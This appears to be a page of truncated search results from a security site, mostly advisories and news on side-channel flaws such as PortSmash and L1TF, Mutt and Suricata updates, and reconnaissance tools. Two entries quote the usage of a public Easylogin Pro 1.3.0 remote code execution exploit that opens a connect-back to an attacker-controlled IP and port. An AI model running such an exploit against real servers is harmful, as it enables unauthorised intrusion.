ALPINE-CVE-2018-5407

Simultaneous Multi-threading SMT in processors can enable local users to exploit software vulnerable to timing attacks via a side-channel timing attack on 'port contention'...

CVE-2018-5407

Simultaneous Multi-threading SMT in processors can enable local users to exploit software vulnerable to timing attacks via a side-channel timing attack on 'port contention'...

Arjun v1.1 - HTTP Parameter Discovery Suite

Features Multi-threading 3 modes of detection Regex powered heuristic scanning Huge list of 3370 parameter names Usage Note: Arjun doesn't work with python Note: Arjun uses nano as the default editor for the prompt bu...

Open Source IPS: Suricata

Suricata is a free and open source, mature, fast and robust network threat detection engine. The Suricata engine is capable of real time intrusion detection IDS, inline intrusion prevention IPS, network security monitoring NSM and offline pcap processing. Suricata inspects the network traffic usi...

New Intel CPU Flaw Exploits Hyper-Threading to Steal Encrypted Data

A team of security researchers has discovered another serious side-channel vulnerability in Intel CPUs that could allow an attacker to sniff out sensitive protected data, like passwords and cryptographic keys, from other processes running in the same CPU core with simultaneous multi-threading...

New Intel CPU Flaw Exploits Hyper-Threading to Steal Encrypted Data

A team of security researchers has discovered another serious side-channel vulnerability in Intel CPUs that could allow an attacker to sniff out sensitive protected data, like passwords and cryptographic keys, from other processes running in the same CPU core with simultaneous multi-threading...

HPSBHF03597 rev. 3 - PortSmash Side-Channel Vulnerability

Potential Security Impact Information disclosure. Source: HP, HP Product Security Response Team PSRT Reported By: Tampere University of Technology, Finland and Technical University, Cuba VULNERABILITY SUMMARY An industry-wide vulnerability has been reported which impacts CPUs that use Simultaneou...

Easylogin Pro 1.3.0 Remote Code Execution

!/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- mrme@pluto:$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337 Easylogin Pro = v1.3.0...

Debian DSA-4277-1 : mutt - security update

Several vulnerabilities were discovered in Mutt, a text-based mailreader supporting MIME, GPG, PGP and threading, potentially leading to code execution, denial of service or information disclosure when connecting to a malicious mail/NNTP server. C Tenable Network Security, Inc. The descriptive te...

Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution

!/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- mrme@pluto:$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337 Easylogin Pro = v1.3.0...

Microsoft Guidance to mitigate L1TF variant

Executive Summary On January 3, 2018, Microsoft released an advisory and security updates for a new class of hardware vulnerabilities involving speculative execution side channels known as Spectre and Meltdown. Microsoft is aware of a new speculative execution side channel vulnerability known as ...

HPSBHF03590 rev. 2 - L1 Terminal Fault (L1TF)

Potential Security Impact Unauthorized exposure of privileged data from memory. Source: HP, HP Product Security Response Team PSRT, Intel Reported By: Intel VULNERABILITY SUMMARY A new speculative execution side channel variant has been discovered called L1 Terminal Fault L1TF. There are no repor...

[SECURITY] Fedora 27 Update: mutt-1.9.2-2.fc27

Mutt is a small but very powerful text-based MIME mail client. Mutt is highly configurable, and is well suited to the mail power user with advanced features like key bindings, keyboard macros, mail threading, regular expression searches and a powerful pattern matching language for selecting group...

[SECURITY] Fedora 28 Update: suricata-4.0.5-1.fc28

The Suricata Engine is an Open Source Next Generation Intrusion Detection and Prevention Engine. This engine is not intended to just replace or emulate the existing tools in the industry, but will bring new ideas and technologies to the field. This new Engine supports Multi-threading, Automatic...

[SECURITY] Fedora 27 Update: suricata-4.0.5-1.fc27

The Suricata Engine is an Open Source Next Generation Intrusion Detection and Prevention Engine. This engine is not intended to just replace or emulate the existing tools in the industry, but will bring new ideas and technologies to the field. This new Engine supports Multi-threading, Automatic...

Photon - Incredibly Fast Crawler Which Extracts Urls, Emails, Files, Website Accounts And Much More

Photon is a lightning fast web crawler which extracts URLs, files, intel & endpoints from a target. Yep, you can use 100 threads and Photon won't complain about it because its in Ninja Mode. Why Photon? Not Your Regular Crawler Crawlers are supposed to recursively extract links right? Well that's...

USN-3719-2: Mutt vulnerabilities

USN-3719-1 fixed a vulnerability in Mutt. This update provides the corresponding update for Ubuntu 12.04 ESM. Original advisory details: It was discovered that Mutt incorrectly handled certain requests. An attacker could possibly use this to execute arbitrary code. CVE-2018-14350, CVE-2018-14352,...

OpenBSD Disables Intel Hyper-Threading to Prevent Spectre-Class Attacks

Security-oriented BSD operating system OpenBSD has decided to disable support for Intel's hyper-threading performance-boosting feature, citing security concerns over Spectre-style timing attacks. Introduced in 2002, Hyper-threading is Intel's implementation of Simultaneous Multi-Threading SMT tha...

OpenBSD Disables Intel Hyper-Threading to Prevent Spectre-Class Attacks

Security-oriented BSD operating system OpenBSD has decided to disable support for Intel's hyper-threading performance-boosting feature, citing security concerns over Spectre-style timing attacks. Introduced in 2002, Hyper-threading is Intel's implementation of Simultaneous Multi-Threading SMT tha...

Security update for python (moderate)

This update for python fixes the following issues: Security issues fixed: - CVE-2017-1000158: Fixed integer overflows in PyStringDecodeEscape that could have resulted in heap-based buffer overflow attacks and possible arbitrary code execution bsc1068664. - CVE-2018-1000030: Fixed crash inside the...